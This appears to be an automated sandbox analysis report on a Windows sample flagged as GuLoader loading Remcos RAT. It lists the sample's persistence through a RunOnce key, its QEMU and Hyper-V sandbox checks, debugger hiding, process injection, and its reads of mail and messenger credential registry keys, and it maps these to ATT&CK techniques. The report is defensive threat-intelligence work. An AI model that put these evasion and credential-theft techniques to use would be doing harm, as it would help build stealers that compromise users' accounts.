Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Unpacked PE file: 23.2.g4FtSOZMD9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: g4FtSOZMD9.exe PID: 7068, type: MEMORYSTR

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_00401F3C push eax; iretd	0_2_00401F3D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228CE2E push edx; retf 2D64h	0_2_0228F5D1
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02281E90 push esi; retn E555h	0_2_022820B8
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02281E90 push esp; retf E809h	0_2_022825C1
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228011A push ds; ret	0_2_02280124
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7C4BD push esp; iretd	9_3_01C7C4CB
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CB54 push eax; retf	9_3_01C7CB55
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CF54 push eax; iretd	9_3_01C7CF55
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CB50 push eax; retf	9_3_01C7CB51
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CF50 push eax; iretd	9_3_01C7CF51
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CB64 pushad ; retf	9_3_01C7CB65
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CF64 pushad ; iretd	9_3_01C7CF65
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CB60 pushad ; retf	9_3_01C7CB61
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CF60 pushad ; iretd	9_3_01C7CF61
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CB68 push 6801C7CBh; retf	9_3_01C7CB6D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 9_3_01C7CF68 push 6801C7CFh; iretd	9_3_01C7CF6D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044693D push ecx; ret	21_1_0044694D
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_004189F0 push FFFFFFAEh; iretd	21_1_004189F3
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_00418981 push FFFFFFAEh; iretd	21_1_004189F3
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044DB70 push eax; ret	21_1_0044DB84
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_0044DB70 push eax; ret	21_1_0044DBAC
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 21_1_00451D54 push eax; ret	21_1_00451D61
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00414060 push eax; ret	22_2_00414074
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00414060 push eax; ret	22_2_0041409C
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00414039 push ecx; ret	22_2_00414049
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_004164EB push 0000006Ah; retf	22_2_004165C4
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00416553 push 0000006Ah; retf	22_2_004165C4
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00416555 push 0000006Ah; retf	22_2_004165C4
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00444355 push ecx; ret	23_2_00444365
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004446D0 push eax; ret	23_2_004446E4
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_004446D0 push eax; ret	23_2_0044470C

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_00404C9D LoadLibraryA,GetProcAddress,

22_2_00404C9D

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

File created: C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs			Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.vbs			Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce CHRYSOME	Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 23_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

23_2_004047C6

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=\RESTROKE.EXE\BREVSAMLINGSSTEDS8SET W = CREATEOBJECT("WSCRIPT.SHELL")
Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL\RESTROKE.EXE\BREVSAMLINGSSTEDS8SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCECHRYSOME

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe TID: 5760	Thread sleep count: 543 > 30			Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe TID: 528	Thread sleep time: -1800000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Thread delayed: delay time: 600000

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Window / User API: threadDelayed 543

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,		22_2_00407898
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 23_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,		23_2_00407C87

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Thread delayed: delay time: 600000

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

System information queried: ModuleInformation

Jump to behavior

Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=\Restroke.exe\Brevsamlingssteds8Set W = CreateObject("WScript.Shell")
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll\Restroke.exe\Brevsamlingssteds8Software\Microsoft\Windows\CurrentVersion\RunOnceCHRYSOME
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: g4FtSOZMD9.exe, 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620803230.0000000001BD7000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: bhvFAB7.tmp.21.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20220102T102601Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=93a49fdf6de24d87bd311ffc5aadad28&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1324233&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1324233&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: g4FtSOZMD9.exe, 00000000.00000002.471537036.0000000002B50000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620742317.0000000001AB0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: g4FtSOZMD9.exe, 00000000.00000002.471655715.000000000319A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: g4FtSOZMD9.exe, 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW$

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_00404C9D LoadLibraryA,GetProcAddress,

22_2_00404C9D

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_0228CE02 mov eax, dword ptr fs:[00000030h]	0_2_0228CE02
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02289E52 mov eax, dword ptr fs:[00000030h]	0_2_02289E52
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02295252 mov eax, dword ptr fs:[00000030h]	0_2_02295252
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02294BE5 mov eax, dword ptr fs:[00000030h]	0_2_02294BE5
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_022920B6 mov eax, dword ptr fs:[00000030h]	0_2_022920B6
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: 0_2_02292C8E mov eax, dword ptr fs:[00000030h]	0_2_02292C8E

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 0_2_022866C3 LdrInitializeThunk,

0_2_022866C3

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Memory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Memory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Memory written: C:\Users\user\Desktop\g4FtSOZMD9.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe "C:\Users\user\Desktop\g4FtSOZMD9.exe"	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Process created: C:\Users\user\Desktop\g4FtSOZMD9.exe C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"	Jump to behavior

Source: g4FtSOZMD9.exe	Binary or memory string: [2022/01/02 02:28:02 Offline Keylogger Started] [2022/01/02 02:28:02 Program Manager]
Source: g4FtSOZMD9.exe, g4FtSOZMD9.exe, 00000009.00000002.620897284.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605956778.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: g4FtSOZMD9.exe, 00000009.00000003.605373507.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620916811.0000000001C8A000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582805331.0000000001C83000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605454693.0000000001C83000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605678171.0000000001C83000.00000004.00000001.sdmp	Binary or memory string: [2022/01/02 02:28:02 Program Manager]
Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: g4FtSOZMD9.exe, 00000009.00000003.605373507.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000002.620897284.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605956778.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp, g4FtSOZMD9.exe, 00000009.00000003.605645190.0000000001C78000.00000004.00000001.sdmp	Binary or memory string: Program Manager5
Source: g4FtSOZMD9.exe, 00000009.00000002.621030433.00000000020B0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: g4FtSOZMD9.exe, 00000009.00000003.582710276.0000000001C78000.00000004.00000001.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_00406B06 GetVersionExA,

22_2_00406B06

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe

Code function: 22_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

22_2_00407C79

Stealing of Sensitive Information:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: ESMTPPassword	23_2_004033E2
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	23_2_00402DA5
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	23_2_00402DA5

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match

File source: Process Memory Space: g4FtSOZMD9.exe PID: 5524, type: MEMORYSTR

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\g4FtSOZMD9.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: g4FtSOZMD9.exe PID: 5452, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture11	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Registry Run Keys / Startup Folder11	Access Token Manipulation1	Obfuscated Files or Information2	Credentials in Registry2	File and Directory Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Process Injection112	Software Packing11	Credentials In Files1	System Information Discovery16	SMB/Windows Admin Shares	Input Capture11	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Registry Run Keys / Startup Folder11	Masquerading1	NTDS	Security Software Discovery41	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion221	LSA Secrets	Process Discovery3	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Virtualization/Sandbox Evasion221	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
g4FtSOZMD9.exe	22%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\Brevsamlingssteds8\Restroke.exe	16%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.0.g4FtSOZMD9.exe.400000.2.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
0.0.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
21.0.g4FtSOZMD9.exe.400000.0.unpack	100%	Avira	TR/Dropper.VB.Gen	Download File
